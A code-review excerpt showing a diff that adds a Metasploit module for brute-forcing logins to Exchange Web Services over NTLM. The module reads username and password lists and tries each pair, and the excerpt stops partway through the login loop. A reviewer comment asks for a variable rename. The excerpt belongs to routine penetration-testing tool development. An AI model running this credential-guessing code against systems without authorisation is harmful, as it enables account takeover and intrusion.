modules/auxiliary/scanner/http/owa_ews_login.rb

```diff
@@ -0,0 +1,165 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/proto/ntlm/message'
+require 'rex/proto/http'
+require 'metasploit/framework/credential_collection'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+      'Name'           => 'OWA Exchange Web Services (EWS) Login Scanner',
+      'Description'    => %q{
+        This module attempts to log in to the Exchange Web Services, often
+        exposed at https://owahost/ews/, using NTLM authentication. This method
+        is faster and simpler than traditional form-based logins.
+      },
+      'Author'         => 'Rich Whitcroft',
+      'License'        => MSF_LICENSE,
+      'DefaultOptions' => { 'SSL' => true, 'VERBOSE' => false }
+    )
+
+    register_options(
+      [
+        OptBool.new('AUTODISCOVER', [ false, "Automatically discover domain URI", true ]),
+        OptString.new('AD_DOMAIN', [ false, "The Active Directory domain name", nil ]),
+        OptString.new('TARGET_URI', [ false, "The location of the NTLM service", nil ]),
+        OptInt.new('RPORT', [ true, "The target port", 443 ]),
+      ], self.class)
+  end
+
+  def run_host(ip)
+    cli = Rex::Proto::Http::Client.new(datastore['RHOSTS'], datastore['RPORT'], {}, datastore['SSL'], datastore['SSLVersion'], nil, '', '')
+    cli.set_config({ 'preferred_auth' => 'NTLM' })
+    cli.connect
+
+    domain = nil
+    uri = nil
+
+    if datastore['AUTODISCOVER']
+      domain, uri = autodiscover(cli)
+      if domain and uri
+        print_good("Found NTLM service at #{uri} for domain #{domain}.")
+      else
+        print_error("Failed to autodiscover - try manually")
+        return
+      end
+    elsif datastore['AD_DOMAIN'] and datastore['TARGET_URI']
+      domain = datastore['AD_DOMAIN']
+      uri = datastore['TARGET_URI']
+      uri << "/" unless uri.chars.last == "/"
+    else
+      print_error("You must set AD_DOMAIN and TARGET_URI if not using autodiscover.")
+      return
+    end
+
+    cli.set_config({ 'domain' => domain })
+
+    creds = Metasploit::Framework::CredentialCollection.new(
+      blank_passwords: datastore['BLANK_PASSWORDS'],
+      pass_file: datastore['PASS_FILE'],
+      password: datastore['PASSWORD'],
+      user_file: datastore['USER_FILE'],
+      userpass_file: datastore['USERPASS_FILE'],
+      username: datastore['USERNAME'],
+      user_as_pass: datastore['USER_AS_PASS']
+    )
+
+    creds.each do |cred|
+      begin
+        req = cli.request_raw({
+          'uri' => uri,
+          'method' => 'GET',
+          'username' => cred.public,
+          'password' => cred.private
+        })
+
+        resp = cli.send_recv(req)
```

Comment:
Instead of using resp, use res to be consistent with other modules and avoid mistakes like https://github.com/rapid7/metasploit-framework/pull/6541 down the line